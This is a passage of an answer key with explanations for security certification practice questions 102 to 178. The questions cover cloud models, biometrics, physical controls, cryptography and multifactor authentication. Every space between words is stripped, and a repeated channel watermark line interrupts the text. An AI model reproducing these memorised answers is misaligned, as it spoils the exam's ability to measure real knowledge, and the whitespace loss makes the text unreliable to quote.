102. C. Thecorrectanswerisapubliccloud.Publiccloudsareusuallylessexpensive.Thecloudproviderhasanumberofcustomersandcostsaredispersed.EvenindividualscanaffordtousecloudstoragewithserviceslikeiCloudandAmazonCloud.Acommunitycloudisusuallyprivateforasmallgroupofpartners.Eachofthepartnersmustshareagreaterpartoftheexpensethantheywouldwithapubliccloud,buttheyretainmorecontroloverthecloudthantheywouldwithapubliccloud.Privatecloudsareoftenthemostexpensiveforsmallerorganizations.Thecompanymustcompletelydevelopandmaintainthecloudresourcesandcannotleveragesharedresources.Ahybriddeploymentmodelisagoodcompromiseformanysituations,butitwilltypicallybemoreexpensivethanapubliccloudforasmallorganization.
103. C. Thecrossovererrorrate(CER)isthepointwheretheFAR(falseacceptancerate)andtheFRR(falserejectionrate)crossover.CERprovidesameansofcomparingbiometricsystemsbasedontheirefficiency,withalowerCERbeingmoredesirable.
104. B. Elasticityisacloudcomputingconceptthatmatchesresourcestodemandtoensurethataninfrastructurecloselymatchestheneedsoftheenvironment.Scalabilityistheabilitytogroworshrinkasneededbutdoesnotdirectlyincludetheconceptofmatchingtoworkload.Normalizationisacodedevelopmentconceptusedtoensurethatdataisinaconsistentform.
105. A. Anuninterruptablepowersupply(UPS)shouldbeNathaniel’sfirstpriority.Ensuringthatpowerisnotdisruptedduringanoutageandcanbemaintainedforashortperioduntilalternatepowerlikeageneratorcan
Telegram Channel @nettrain
comeonlineiscritical,andaUPScanprovidethatcapability.Ageneratoralonewilltakelongertocomeonline,resultinginanoutage.Dualpowersuppliescanhelptobuildresiliencebyallowingmultiplepowersourcesandavoidingissuesifapowersupplydoesfail,butthatisnotthefocusofthequestion.Amanagedpowerdistributionunit(PDU)providesremotemanagementandpowermonitoringbutwillnotpreventpowerlossinanoutage.
106. B. Virtualmachine(VM)sprawlreferstoasituationinwhichthenetworkhasmorevirtualmachinesthantheITstaffcaneffectivelymanage.TheremainingoptionsdonotmatchthetermVMsprawl.
107. C. StoredproceduresarecommonlyusedinmanydatabasemanagementsystemstocontainSQLstatements.Thedatabaseadministrator(DBA),orsomeonedesignatedbytheDBA,createsthevariousSQLstatementsthatareneededinthatbusiness,andthenprogrammerscansimplycallthestoredprocedures.Storedproceduresarenotrelatedtodynamiclinkedlibraries(DLLs).Storedprocedurescanbecalledbyotherstoredproceduresthatarealsoontheserver.Finally,storedproceduresarenotrelatedtomiddleware.
108. D. Bollardsarelargebarriersthatareoftenmadeofstrongsubstanceslikeconcrete.Theyareeffectiveinpreventingavehiclefrombeingdrivenintoabuilding.Noneoftheotheranswersmatchthepurposeofabollard.
109. D. Selahshouldbeconcernedaboutcloningthebadgesbecausemagneticstripebadgesarerelativelysimpletocloneinmostcases.Tailgatingiscommon,particularlyiftherearelargenumbersofemployees,sinceemployeesareunlikelytoallowdoorstocloseandthenreopenthemforeverypersonwhoentersduringshiftchanges.Sincemagneticstripereadersdonotrequireanyadditionalinformation,usebyunauthorizedindividualsiseasyifabadgeislostorstolen.
110. A. Virtualmachine(VM)escapeattacksrelyonaflawinthehypervisorthatcouldallowanattackertoattackthehypervisoritself.Typicalsystemadministrationbestpracticescanhelp,includingregularpatchingofthehypervisor,butintheeventofasuccessfulescapeattack,limitingdamagebykeepingVMsofthesamesensitivitylevelisolatedtothesamehostcanpreventbroaderimpact.Antivirusisalwaysagoodideaandmayevenstopsomemalware-basedVMescapeattacks,butisolatingtheVMismoreeffective.Full-diskencryption(FDE)willhavenoeffectsincethediskmust
Telegram Channel @nettrain
beunencryptedduringoperation.ATrustedPlatformModule(TPM)isusedforstoringcryptographickeys.
111. C. Managedsecurityserviceproviders(MSSPs)areanoutsidecompanythathandlessecuritytasks.Someorevenallsecuritytaskscanbeoutsourced,includingintrusiondetectionandprevention(IDS/IPS)management,securityinformationandeventmanagement(SIEM)integration,andothersecuritycontrols.Software-definednetworking(SDN)wouldmakemanagingsecuritysomewhateasierbutwoulditselfbedifficulttoimplement.Automatingasmuchsecurityactivityasispracticalwouldhelpalleviatetheproblembutwouldnotbeaseffectiveassecurityasaservice.Finally,onlyimplementingafewsecuritycontrolswouldlikelyleavecontrolgaps.
112. B. Cryptographichashesareusedforintegritycheckingoffiles,networkpackets,andavarietyofotherapplications.Storingacryptographichashoftheapplicationandcomparingtheapplicationonthenetworktothathashwillconfirm(orrefute)whethertheapplicationhasbeenalteredinanyway.Networkintrusiondetectionornetworkintrusionpreventionsystems(NIPSs/NIDSs)areuseful,buttheywon’tpreventanapplicationfrombeingaltered.Sandboxingisusedtoisolateanapplication,butitwon’tdetectwhetherithasbeentamperedwith.
113. C. SeparatingtheSCADA(SupervisoryControlandDataAcquisition)systemfromthemainnetworkmakesitlesslikelythattheSCADAsystemcanbeaffectedfromthemainnetwork.Thisincludesmalwareaswellashumanaction.Software-definednetworking(SDN)wouldmakeisolatingtheSCADAsystemeasierbutwouldnotactuallyisolateit.Patchmanagementisalwaysimportant,butinthiscase,itwouldnothavepreventedtheissue.Encrypteddatatransmissions,suchasTLS,wouldhavenoeffectonthissituation.
114. B. Gordonshouldimplementaversionnumberingschemeandensurethatthepropercurrentversionofsoftwarecomponentsisincludedinnewreleasesanddeployments.Developerscouldstillmanuallyreintroduceoldcode,butversionnumberinghelpstoensurethatyouhaveacurrentversioninuse.Neithercontinuousdeploymentnorcontinuousintegrationwillpreventoldcodefrombeinginserted,andreleasemanagementmayrelyonversionnumberingbutwon’tpreventitbyitself.
115. D. TransportLayerSecurity(TLS)providesareliablemethodof
Telegram Channel @nettrain
encryptingwebtraffic.Itsupportsmutualauthenticationandisconsideredsecure.AlthoughSecureSocketsLayer(SSL)canencryptwebtraffic,TLSwascreatedin1999asitssuccessor.AlthoughmanynetworkadministratorsstillusethetermSSL,inmostcasestodaywhatyouareusingisactuallyTLS,nottheoutdatedSSL.PPTPandIPSecareprotocolsforestablishingaVPN,notforencryptingwebtraffic.
116. A. Smartcardscansupportmoderncryptographicalgorithms,meaningthatweaksecurityduetoasmartcard’slimitationsonencryptionisnotacommonissue.Smartcardreadersandmaintenancedoaddadditionalexpense,anduserexperiencesarelimitedbytheneedtohavethecardinhandandinsertitorpresentittoareadereitherduringauthenticationorforentiresessions.SmartcardstypicallyhaveaPINorpassword,meaningthattheyareusedformultifactor,notsingle-factor,authentication.
117. D. Settingoffanalarmsothatstaffbecomeusedtoitbeingafalsepositiveisatechniquethatpenetrationtestersmayuseiftheycangainaccesstoafacility.Oncestaffareusedtoalarmsgoingoffandignoreit,thepenetrationtesterscanenterareasthatarealarmedwithoutaresponseoccurring.Settingoffthealarmaspartofatestisn’ttypicalforpenetrationtesters,anddisablingthealarmandwaitingforthelackofanalarmtobereportedisalsomorelikelytobepartofaninternaltest,notapenetrationtest.Askingstaffmemberstoopenthedoorisnotameansofmakingalarmslesseffective,andstaffmemberswhoknowthedoorisalarmedareunlikelytodoso.
118. C. Theterm“XaaS”referstoanythingasaservice,abroadreferencetothehugenumberofoptionsthatexistforservicesviathird-partyproviders.Therestoftheoptionsforthisquestionweremadeupforthequestion.
119. D. Signageplaysmultiplerolesinsecureenvironments,includingdiscouragingunwantedorunauthorizedaccess,providingsafetywarnings,andhelpingwithevacuationroutesandothernavigationinformationaspartofaphysicalsafetyeffort.
120. B. Norahasestablishedacoldsite.Acoldsiteisalocationthatcanbebroughtonlinebutdoesnothavesystems;coldsitestypicallyhaveaccesstopowerandbandwidth,buttheyneedtobefullyequippedtooperateafteradisastersincetheyarejustrentedspace.WarmsiteshavesomeoralloftheinfrastructureandsystemsNoraneedsbutdoesnothavedata.Ahotsiteisafullyfunctionalenvironmentwithallofthehardware,software,and
Telegram Channel @nettrain
dataneededtooperateanorganization.Theyareexpensivetomaintainandrunbutareusedbyorganizationsthatcannottaketheriskofdowntime.AMOUisamemorandumofunderstandingandisnotatypeofdisasterrecoverysite.
121. A. Windowscallsthepointthatitsavestoreturntoaknowngoodconfigurationasystemrestorepoint.Mattshouldsetonepriortoinstallingnewsoftwareorpatchingifheisworriedaboutwhatmightoccur.TherestoftheoptionsarenotWindowsterms.
122. A. TOTP,ortime-basedone-timepassword,algorithmsrelyonthetimebeingaccuratebetweenbothoftheauthenticationhosts.Thatmeansthatifasystemordeviceisnotproperlysyncedtoanauthoritativeandcorrecttimeserver,orifitslocalsystemtimehasdrifted,theauthenticationmayfail.AlthoughTOTPsystemshavesomeflexibility,aclockthatissufficientlyincorrectwillcauseanissue.HMAC-basedone-timepassword(HOTP)andshortmessageservice(SMS)-basedmultifactorsystemsdonotsufferfromthisissue,andMMACwasmadeupforthisquestion.
123. C. Objectdetectioncapabilitiescandetectspecifictypesorclassesofobjectsandcanbeusedtodetermineiftheobjectismoved.Inthiscase,Ninacouldenableobjectdetectiontonotifyherwhenpackagesaredelivered,andshemaybeabletospecificallyselectanobjecttomonitorforadditionalsecurity.Infraredcapabilitiesareusefulinlow-lightsituations,motiondetectionhelpstopreservestoragespacebyonlyrecordingwhenmotionoccurs,andfacialrecognitioncouldhelpidentifyspecificindividualsbutwon’thelpwithpackages.
124. C. Althoughuserhealthdataisaconcernforthewearerofthedevice,unlessthedeviceisrequiredbytheorganization,theuser’shealthdataistypicallynotanorganizationalsecurityconcern.GPSlocationdata,dataexposurefromdatathatiscopiedtooraccessiblefromthedevice,andthepotentialfordevicestoactasunsecuredwirelessgatewaystotheorganization’snetworkareallcommonsecurityconcernsforwearables.Lackofpatching,lackofdeviceencryption,andtheinabilitytoenforcecomplianceorsecuritypoliciesarealsocommonconcernsforwearables.
125. D. AFaradaycageisametalwiremeshdesignedtoblockelectromagneticinterference(EMI).NoneoftheotheranswersdescribewhataFaradaycageisusedfororcapableof.
126. B. Smartcardspairedwithelectroniclockscanbeusedtoallowentrance
Telegram Channel @nettrain
intoabuilding.Thesmartcardsystemcanalsostoreinformationabouttheuser,andthusthesystemcanlogwhoentersthebuilding.Asecurityguardwithasign-insheetwouldfunction,buttherearemanywaystosubvertasign-insheet,andaguardcanbedistractedorbecomeinattentive.Thismakessmartcardaccessabettersolution.Guardsarealsomoreexpensiveovertime.Acamerawouldrecordwhoentersbutwouldnotcontrolaccess.Anonemployeecouldenterthebuilding.Anuncontrolled/supervisedsign-insheetwouldnotbesecure.
127. D. Althoughelectroniclocksofferanumberofadvantages,includingtheabilitytoprovidedifferentcodesoraccesstodifferentusersandtheabilitytodeprovisionaccess,theyalsorequirepower,whetherintheformofabatteryorconstantlyprovidedpowerfromapowersource.Thatmeansthatpowerlosscancauseissues,eitherduetothelockremaininglockedordefaultingtoanopenstate.
128. A. Managingherorganization’sIPaddressschemaandusagewillallowKaratoidentifyunknownandpotentiallyroguedevices.IPaddressesarenotusedtosecureencryptionkeys,andmanagingaschemawillnothelppreventdenial-of-serviceattacks.KeepingtrackofwhatIPaddressesareinusecanhelpavoidIPaddressexhaustion,butthisdoesnotprovideadirectsecurityadvantage.
129. C. Ofthelockslistedhere,deadboltsarethemostsecure.Thelockingboltgoesintothedoorframe,makingitmoresecure.Whetheralockusesakeyorcombinationdoesnotchangehowsecureitis.Key-in-knobisaverycommon,andgenerallyprovideslessresistancetobypassthanadeadbolt-basedsolution.Finally,padlockscanbecutoffwithcommonboltcutters.
130. B. NICteamingcanprovidegreaterthroughputbysendingtrafficthroughmultiplenetworkinterfacecards(NICs)whilealsoensuringthatlossofacardwillnotcauseanoutage,thusprovidingfaulttolerance.
131. A. Falseacceptancerate(FAR)istherateatwhichthesystemincorrectlyallowsinsomeoneitshouldnot.Thisisclearlyasignificantconcern.Anyerrorisaconcern,butthefalserejectionrateislesstroublesomethanthefalseacceptancerate.Thecross-overerrorrate(CER)iswhentheFARandthefalserejectionrate(FRR)becomeequal.Thisindicatesaconsistentoperationofthebiometricsystem.Theequalerrorrateisanothernameforcross-overerrorrate.
132. C. Datasovereigntyreferstotheconceptthatdatathatiscollectedand
Telegram Channel @nettrain
storedinacountryissubjecttothatcountry’slaws.Thiscanbeacomplexissuewithmultinationalcloudservicesandprovidersthatmaystoredatainmultiplecountriesaspartoftheirnormalarchitecture.Itmayalsocreatecomplianceandotherchallengesbasedondifferencesinnationallawsregardingdata,dataprivacy,andsimilarissues.
133. A. Low-powerdevicestypicallyhavelimitedprocessorspeed,memory,andstorage,meaningthatencryptioncanbeachallenge.Fortunately,solutionsexistthatimplementlow-powercryptographicprocessingcapabilities,andcontinuedadvancesinprocessordesigncontinuetomakelower-powerprocessorsfasterandmoreefficient.Legallimitationsdonottypicallytakeintoaccountwhetheradeviceisalow-powerdevice,andpublickeyencryptioncanbeimplementedonawiderangeofCPUsandembeddedsystems,sofactoringprimenumbersisunlikelytobeanissue.
134. A. Asecurecabinetorsafeistamper-proofandprovidesagoodplacetostoreanythingyouaretryingtophysicallyprotect.Encryptingthumbdriveswouldrequireyoutostorethekeyusedtoencryptthethumbdrive,thuscontinuingtheproblem.ItisactuallyagoodpracticetostoreBitLockerkeysonremovablemedia,providedthatmediaissafeguarded.Inmostcases,deskdrawersarenotsecureandcaneasilybebrokeninto,eveniftheyarelocked.
135. D. RAID6,diskstripingwithdualparity,usesaminimumoffourdiskswithdistributedparitybits.RAID6canhandleuptotwodisksfailing.RAID3isbyte-levelstripingwithdedicatedparityandcannottoleratemorethanasingledrivefailing.RAID0isdiskstriping,whichcannothandlediskfailure,andRAID5,diskstripingwithdistributedparity,canhandleonlyonediskfailing.
136. C. Theabilitytorecordisnotincludedinmanytraditionalclosed-circuittelevision(CCTV)monitoringsystemsandisakeyelementofinvestigationsoftheftandotherissues.Motionactivationandfacialrecognitionaretypicallyassociatedwithcomputer-basedcamerasystemsbutdonotdirectlyaddresstheconcernMariaisworkingtohandle.Infraredcameraswouldbemoreusefulinspaceswherelightswerenotalwaysinuse,suchasoutdoorsorinfacilitiesthatarenotoccupiedatnight.
137. C. Staticcodesaretypicallyrecordedinasecurelocation,butiftheyarenotproperlysecured,orareotherwiseexposed,theycanbestolen.Brute-forceattemptsshouldbedetectedandpreventedbyback-offalgorithmsand
Telegram Channel @nettrain
othertechniquesthatpreventattacksagainstmultifactorauthenticationsystems.Collisionsexistwithhashingalgorithms,notwithstaticmultifactorcodes,andclockmismatchissuesoccurfortime-basedone-timepassword(TOTP)codes.
138. B. Asymmetriccryptosystemwilltypicallyperformfasterandwithlessprocessoroverheadandthuslowerlatencythanasymmetriccryptosystems.Hashingisnotencryption,andone-timepadsarenotimplementedinmoderncryptosystems,althoughtheymayhaveusesinfuturequantumcryptographicsolutions.
139. A. Industrialcamouflageeffortsminimizehownoticeableafacilityis,helpingittoremainunnoticedbycasualobservers.Althoughindustrialcamouflagecanbeuseful,itisrarelyeffectiveagainstdeterminedadversaries.Ademilitarizedzone(DMZ)ininformationsecuritytermsisanetworksegmentthatisintentionallyexposedtothepublicwithappropriatesecurityprotecting,whilestrongersecurityisappliedtononpublicresources.Disruptivecolorationisacamouflagetechniquebutnotoneusedininformationsecurity.Industrialobfuscationwasmadeupforthisquestion.
140. A. Asymmetriccryptographyhasarelativelyhighcomputationaloverhead,makingsymmetrickeyencryptionfaster.Thatmeansthatonceyoucanexchangeanephemeralsymmetrickey,oraseriesofkeys,youcanencryptandsenddatamorequicklyandefficientlyusingsymmetricencryption.Thereisnokeylengthlimitation,andreasonablelifespansaremetwitheithertechnology.Keyreuseisnotanissuewithapublickeyencryptionscheme.
141. D. Failuretoreleasememoryyouhaveallocatedcanleadtoamemoryleak.Therefore,ifyouareusingaprogramminglanguagelikeC++thatallowsyoutoallocatememory,makecertainyoudeallocatethatmemoryassoonasyouarefinishedusingit.Allocatingonlythevariablesizeneededanddeclaringvariableswhereneededaregoodprogrammingpractices.However,failuretofollowthemjustleadstowastefuluseofmemory;itdoesnotleadtoasecurityproblemlikeamemoryleak.Althoughthisisagoodideatopreventbufferoverflows,itisnotamemorymanagementissue.
142. B. Usingalongerkeyisthebestwaytomakeitlesslikelythatanencryptedfilewillbecracked.Thisdoesnotpreventissueswiththe
Telegram Channel @nettrain
algorithmitself,butifavulnerabilityisnotfoundinanalgorithm,addingkeylengthwillhelpensurethatevensignificantincreasesincomputationalpowerwillnotresultintheencryptionbeingcrackedinareasonableperiodoftime.Quantumcomputinghasthepotentialtochangethis,butpracticalquantumencryptioncrackingtoolsarenotknowntobeavailableyet.Thereisnosuchthingasananti-quantumcipher,andarotatingsymmetrickeymightbeusedtoensurethatakeycouldnotbecrackedbutdoesnotprovidelongevity.Instead,itisusedtoallowephemeralcommunicationstobelesslikelytobecrackedonanongoingbasis.
143. C. ThebestanswerfromthislistisDLP,ordatalosspreventiontechnology.DLPisdesignedtoprotectdatafrombeingexposedorleakingfromanetworkusingavarietyoftechniquesandtechnology.Statefulfirewallsareusedtocontrolwhichtrafficissenttoorfromasystem,butwillnotdetectsensitivedata.OEMisanoriginalequipmentmanufacturer,andsecurityinformationandeventmanagement(SIEM)canhelptrackeventsandincidentsbutwillnotdirectlyprotectdataitself.
144. C. Encryptionkeysusedforquantumkeydistributionaresentintheformofqubits.Thepolarizationstateofthequbitsreflectsthebitvaluesofthekey.Oncesent,thereceivercanvalidatethestateofsomeofthosequbitstoensurebothsenderandreceiverhavethesamekey.Bytesandbitsareusedintraditionaldataexchanges,andnuquantsweremadeupforthisquestion.
145. B. Two-personcontrolschemesrequiretwoindividualstobeinvolvedtoperformanaction.ThismeansthatAliciacanimplementatwo-personcontrolschemeknowingthatbothindividualswouldhavetobeinvolvedtosubvertthecontrolprocess.Biometricswillmerelyvalidatethatapersoniswhotheysaytheyare,roboticsentriesdonotaddanyparticularvaluetothisscenario,andademilitarizedzone(DMZ)isusedtokeepfront-facingsystemsinazonethatcanbecontrolledandsecured.
146. A. Socialloginisanexampleofafederatedapproachtousingidentities.Thecombinationofidentityprovidersandserviceproviders,alongwithauthorizationmanagement,isakeypartoffederation.AAAisauthentication,authorization,andaccountingandistypicallyassociatedwithprotocolslikeRADIUS.Privilegecreepoccursasstaffmemberschangejobsandtheirprivilegesarenotadjustedtoonlymatchtheircurrentrole.IAMisabroadersetofidentityandaccessmanagementpractices.AlthoughIAMmaybeinvolvedinfederatedidentity,thisquestiondoesnotdirectlydescribeIAM.
Telegram Channel @nettrain
147. A. USBdatablockersareusedtoensurethatcablescanonlybeusedforcharging,andnotfordatatransfer.Noneoftheotheranswerstothisquestionareusedforthispurpose,andinfactallweremadeup—USBisaserialbus,circuitbreakersareusedforpower,andHMAC-basedone-timepassword(HOTP)isatypeofmultifactortokenalgorithm.
148. B. Intheplatform-as-a-service(PaaS)model,theconsumerhasaccesstotheinfrastructuretocreateapplicationsandhostthem.Software-as-a-service(SaaS)suppliesaparticularapplication;infrastructure-as-a-service(IaaS)doesnotdirectlyprovidetheabilitytocreateapplications,althoughthisdistinctionisquicklyblurring;andIDaaSisidentity-as-a-service.
149. B. Avoidingreuseofthekeycomponentsofanencryptionprocessmeansthatevenifamaliciousactormanagedtobreaktheencryptionforamessageorexchange,thenextnewinitializationvector(IV)andkeywouldrequireanentirelynewbrute-forceattack.UsinganewIVandkeydoesnotmakebrute-forceattacksimpossible,nordoesitmakebruteforceeasier.Asinglesuccessfulattackwouldexposeasinglemessage,orhowevermuchdatawasencryptedusingthatIVandkey.
150. C. TheLinuxkernelusesuser-driveneventslikekeystrokes,mousemovement,andsimilareventstogeneraterandomness(entropy).Thetimeofdayisnotrandom,userloginsaretypicallynotfrequentenoughorrandomenoughtobeausefulsourceofentropy,andnetworkpackettimingisnotusedforthis.Ifyouencounteraquestionlikethisanddon’tknowwheretostart,considerwhatyouknowaboutentropy—itisrandomness,soyouwouldbelookingfortheinputthatwouldhavethemostrandomnesstoit.Thus,youcouldruleoutthetimeofday,andlikelyuserlogins.Afterthat,youmightconsiderwhatcouldbecontrolledbyanexternalparty:networkpacketsbeingsenttothesystem,andrulethatoutasapotentialattackvector.Thatleaveskeyboardinputandmousemovement.
151. C. EllipticcurveencryptionschemesallowtheuseofashorterkeyforthesamestrengththatanRSAkeywouldrequire,reducingthecomputationaloverheadrequiredtoencryptanddecryptdata.Thatdoesn’tmeanyoushoulduseashortkey;instead,youmustselectakeylengththatmatchesyourrequirementsforresistancetobruteforceandotherattacks.Hashingisnonreversibleandisnotaformofencryption.
152. C. Lightingservesadeterrentcontrol,makingpotentialmaliciousactorsfeelliketheymaybeobservedwithoutdarkareasorshadowstohidein.It
Telegram Channel @nettrain
doesnotdetectactions,itdoesnotcompensateforthelackofanothercontrol,andalthoughsomelightsmayturnonformotion,theprimarypurposeistodetermaliciousorunwantedactions.
153. C. Edgecomputingplacesbothdatastorageandcomputationalpowerclosertowhereitisneededtosaveonbandwidthandtoimprovetheresponseofassociatedapplicationsandservices.Hybridcomputingcombineslocalandcloudcomputing.Localcloudbuildscloudinfrastructureonlocalsystems.Mistcomputingwasmadeupforthisquestionbutmaysoundsimilartofogcomputing,atermthathasasimilarmeaningtoedgecomputing,whichuseslocalcomputationandstoragethatisthenInternetconnected.
154. D. Benhasdeployedatokenizationscheme.Encryptionwouldrequirethedatatobedecryptedtobeused,andthisisnotmentioned.Hashingcouldbeusedtoconcealvaluesbutdoesnotpreservetheabilitytoworkwiththedata.Maskingmodifiescontenttoconcealpersonallyidentifiableinformationorothersensitiveinformation.
155. D. FencingisbothausefuldeterrentbecauseitdiscouragesmaliciousactorsfromaccessingthegroundsthatDanawantstoprotect.Itisalsoanexampleofaphysicalcontrol.Avisitorlogisanadministrativecontrolandwillnotdetermaliciousactors.Motiondetectorsandcamerasareexamplesofdetectivecontrols.
156. A. Addingadigitalsignaturecanensurethatboththemessagehasnotbeenchanged,andthusitsintegrityisintact,andthatitsupportsnonrepudiationbyprovingthatthemessageisfromthesenderwhoclaimstohavesentit.
157. B. Attestationprocessesrequestresponsiblemanagersorotherstovalidatethatuserentitlementsorprivilegesarecorrectandmatchthosethattheusershouldhave.Attestationisnotanemploymentverificationprocess,althoughmanagersmaydiscoverthatuserswhohavelefttheorganizationstillhaverightsaspartofanattestationprocess.Itdoesnotrequireproofofidentityorvalidationofsecuritycontrols.
158. B. Ageneratoristhemostappropriateanswertoamultihouroutage.Althoughahotsitewouldallowherorganizationtostayonline,thecostofahotsiteismuchhigherthanthatofagenerator.APDU,orpowerdistributionunit,isusedtomanageanddistributepower,nottohandlepoweroutages.Finally,UPSsystemsarenottypicallydesignedtohandle
Telegram Channel @nettrain
longoutages.Instead,theyconditionpowerandensurethatsystemsremainonlinelongenoughforageneratortotakeoverprovidingpower.
159. A. AMACsupportsauthenticationandintegrityandisusedtoconfirmthatmessagescamefromthesenderwhoisclaimedtohavesentitandalsoensurethatrecipientscanvalidatetheintegrityofthemessage.Itdoesnothelpwithconfidentiality.
160. C. Inertgassystemsareusedtoreducetheoxygeninaroomwithoutthehazardtostaffthatcarbondioxidesystemsuse.Bothdry-pipeandpre-chargesystemsusewater,whichcanharmdelicateelectronics.
161. C. ProximitycardreadersusuallyworkusingRFID(radiofrequencyID)technology.Thisallowscardstobeusedinproximitybutwithoutrequiringadirectreaderlikeamagneticstripe.Neitherbiometricsorinfraredareusedforproximitycardreaders.
162. A. Digitalsignaturesthatuseasender’sprivatekeyprovidenonrepudiationbyallowingasendertoprovethattheysentamessage.Unlessthesender’sprivatekeyhasbeencompromised,signingamessagewiththeirprivatekeyandallowingtherecipienttovalidatethesignatureusingtheirpublickeyensuresthatthesendersentthemessageinquestion.Longerkeysdon’tprovewhoasenderis,hashesarenotreversible,andthepublickeyinuseisthesender’s,nottherecipient’s.
163. B. Naturaldisasters,aswellasman-madedisasters,areprimaryconsiderationsforgeographicsecurityconsiderations.Placingbackupsitesoutsideofthelikelypathorrangeofasingledisasterhelpsensurecontinuityofoperationsfororganizations.MTRisthemaximumtimetorestore,sprawlavoidanceisusuallyconsideredforvirtualmachines,andserviceintegrationisaconsiderationforservicearchitectures,notgeographicalplacement.
164. B. Althoughactualthreatsfromdronesandunmannedaerialvehicles(UAVs)arerelativelyrareformostorganizations,placingsensitiveareasfurtherinsideabuildingwilldetermostcurrentgenerationsofdronesfromenteringorrecordingthem.SecuritydoorsandothercommonobstacleswillpreventmostUAVordronepenetrationthattypicalorganizationswillface.Fencesareeasilybypassedbyflyingdrones,biometricsensorswon’tstopadronefromhoveringoutsideofawindow,andFaradaycagesmightstopadronefromreceivingcommandsifyoucouldgetthedroneinsidefirst!
165. D. Thekeytrade-offwhenconsideringresourceconstraintsforencryption
Telegram Channel @nettrain
isthatstrongerencryptionwithlongerkeysrequiresmorecomputationaltimeandresources.Thismeansthatitwillbeslowerandwillconsumemoreofthecapacityofasystem.Abalancebetweensecurityandcomputationaloverheadneedstobestruckthatmatchestheconfidentialityneedsofthedatathatisbeinghandledorsent.Strongerencryptionisusuallyslower,runningoutofentropyinthescenariodescribedisnotatypicalconcern,andstrongerencryptiontakingupsignificantamountsofdrivespaceisalsonotarealissueinthisscenario.
166. C. Encryptingthemessagewillensurethatitremainsconfidentialaslongasonlytherecipientisabletodecryptit.Hashingthemessagewillresultinthemessagenotbeingrecoverable,whereasdigitallysigningitcanprovidenonrepudiation.Finally,quantumencryptionalgorithmsandthesystemsrequiredtousethemarenotavailabletoday,meaningAmandawon’tbeabletousethem—yet!
167. C. Inmostcases,themajorcloudserviceprovidershavemoresecuritystaffandagreaterbudgetforsecurityoperations.Thismeanstheycaninvestmoreinsecuritycontrols,staffing,monitoring,andotheractivities.Usingacloudserviceprovidercanhelpimprovetheoverallsecuritypostureofanorganizationthatmightnothavetheabilitytohavefull-timeordedicatedsecuritystafforexpertise.Atthesametime,localstaffwillunderstandthebusinessbetterandwillusuallyhaveafasterresponsetimetocriticalbusinessneeds.
168. D. Networkloadbalancersdistributetrafficamongsystems,allowingsystemstobeaddedorremoved,andmakingpatchingandupgradeseasierbydrainingconnectionsfromsystemsandremovingthemfromthepoolwhenworkneedstobedoneonthem.Theycanalsohelpmonitorsystemsforperformance,reportonissues,andensurethatloadsmatchthecapabilitiesofthesystemsthattheyareinfrontof.Firewallsareusedforsecurity,switchesareanetworkdeviceusedtotransfertraffictothecorrectsystem,andahorizontalscalerwasmadeupforthisquestion.
169. D. Protectedcabledistributionusessuchcontrolsaselectrical,electromagnetic,andevenacousticorairpressuresensorstoensurethatcablesanddistributioninfrastructurearenotaccessed,allowingsensitiveinformationtobetransmittedinunencryptedform.TheU.S.governmentidentifiesthreeoptions:hardenedcarrier,alarmedcarrier,andcontinuouslyviewedprotecteddistributionsystems.ShieldedcablesareusedtopreventEMI.
Telegram Channel @nettrain
170. B. Maureenisusingtheconceptofaudiosteganographybyhidingdatainsideanaudiofileinawaythatconcealsitfromdetection.Theotheroptionsaremadeupforthisquestion.
171. B. SinceNicoleisspecificallyworriedaboutSMSpushestocellphones,themostlikelyattackmodelisSIM(subscriberidentitymodule)cloning,allowingattackerstoobtaintheauthenticationcodessenttolegitimateusers.AttacksonaVoiceoverInternetProtocol(VoIP)systemwouldtypicallyhelpinterceptSMSifitwassenttoVoIPphones,notcellphones(althoughforwardingispossible,butnotmentionedhere).Brute-forceattacksareunlikelytosucceedagainstSMSphonefactors,andrainbowtablesareusedtocrackhashedpasswords.
172. C. Encryptionisoftenusedtoprotectdataatrest.Whendataneedstobeaccessed,itcanbedecrypted.Hashingisnotreversible,meaningthatitisnotusedfordatastoragewhentheoriginalformisneededforprocessing.Comparinghashedpasswordsworksbecausethepasswordispresentedagain,ratherthanthepasswordneedingtoberetrievedfromstorage.TLSisusedtoprotectdatainmotion,andtokenizationisadatasecuritytechniquethatreplacessensitivedataelementswithnonsensitiveelementsthatcanstillbeprocessedinusefulways.
173. B. Nathanielhascreatedanairgap,aphysicalseparationthatwillrequiremanualtransportoffiles,patches,andotherdatabetweenthetwoenvironments.Thishelpstoensurethatattackerscannotaccesscriticalsystemsandthatinsiderscannotexportdatafromtheenvironmenteasily.Ademilitarizedzone(DMZ)isaseparatenetworksegmentorzonethatisexposedtotheoutsideworldorotherlowertrustarea.Avaultisasecuredspaceorroom,butvaultingisnotatermusedontheSecurity+exam,andahotaisleistheaislewhereserversexhaustwarmair.
174. A. Maskingmodifiescontenttoconcealpersonallyidentifiableinformation(PII)orothersensitiveinformation.Tokenizationreplacessensitiveinformationwithanonsensitivealternativethatallowsthedatatostillbeprocessedinusefulways.Encryptionwouldrequirethedatatobedecryptedtobeused,andthisisnotmentioned.Hashingcouldbeusedtoconcealvaluesbutdoesnotpreservetheabilitytoworkwiththedata.
175. C. On-premisescloudcomputingisoftencalledprivatecloud.Notallprivatecloudshavetobeon-site,becauseprivatecloudscouldbedeployedtoaremotelocationlikeathird-partyhostingfacility.Infrastructureasa
Telegram Channel @nettrain
serviceandplatformasaservicerefertothird-partyhostingservices,andhybridcloudcombinesbothon-premisesandcloudcomputingmodels.
176. C. Themostlikelythreattophysicaltokensistheftorlossresultinginaccesstothetoken.Cloningtokensmightbepossibleifthetoken’sseedwereknown,buttheyaredesignedtopreventthisfrombeingreverse-engineered,meaningasignificantbreachofthevendororsimilarissuewouldberequiredtocauseanexposure.Bruteforceisnotarealisticthreatagainstmosttokenimplementations,norisalgorithmfailure.
177. D. Controldiversitymeansutilizingdifferentcontrolstomitigatethesamethreat.Formalware,theuseoftechnicalcontrols,suchasantimalware,iscritical.Butitisalsoimportanttohaveadministrativecontrols,suchasgoodpolicies,andtoensurethatemployeesareproperlytrained.Thus,forthisquestionacombinationofpolicies,training,andtoolsisthebestanswer.
178. A. AlthoughitmayseemlikeCharleshaspresentedtwofactors,infacthehasonlypresentedtwotypesofthingsheknowsalongwithhisidentity.Totrulyimplementamultifactorenvironment,heshouldusemorethanoneofsomethingyouhave,somethingyouknow,andsomethingyouare.
